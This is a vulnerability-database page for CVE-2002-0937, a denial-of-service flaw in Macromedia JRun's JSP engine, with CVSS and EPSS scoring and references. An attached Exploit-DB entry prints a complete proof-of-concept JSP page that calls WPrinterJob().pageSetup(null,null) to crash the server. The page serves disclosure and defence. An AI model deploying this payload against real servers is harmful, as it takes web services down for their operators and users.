CVE-2002-0937 : Detail

CVE-2002-0937

0.67%V3
Network
2002-08-31
02h00 +00:00
2002-09-10
07h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The Java Server Pages (JSP) engine in JRun allows web page owners to cause a denial of service (engine crash) on the web server via a JSP page that calls WPrinterJob().pageSetup(null,null).

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 21536

Publication date : 2002-06-11 22h00 +00:00
Author : Marc Schoenefeld
EDB Verified : Yes

source: https://www.securityfocus.com/bid/4997/info A vulnerability has been reported in Macromedia JRun for Windows that results in a denial of service condition. The vulnerability occurs when JRun encounters a malicious JSP page. The following snippet of code is reported to crash the JRun JSP engine: new WPrinterJob().pageSetup(null,null); <%@ page contentType="text/html;charset=UTF-8" pageEncoding="iso-8859-1" %> <%@ page import="sun.awt.windows.*" %> <%! %> <% // %> <html> <head> <title>aa</title> </head> <body> <p> <FONT SIZE="+2">dON/T TR1 thiz @ home</font> </p> <% new WPrinterJob().pageSetup(null,null); %> </body> </html>

Products Mentioned

Configuraton 0

Macromedia>>Jrun >> Version 3.0

Macromedia>>Jrun >> Version 3.1

Macromedia>>Jrun >> Version 4.0

References

http://www.securityfocus.com/bid/4997
Tags : vdb-entry, x_refsource_BID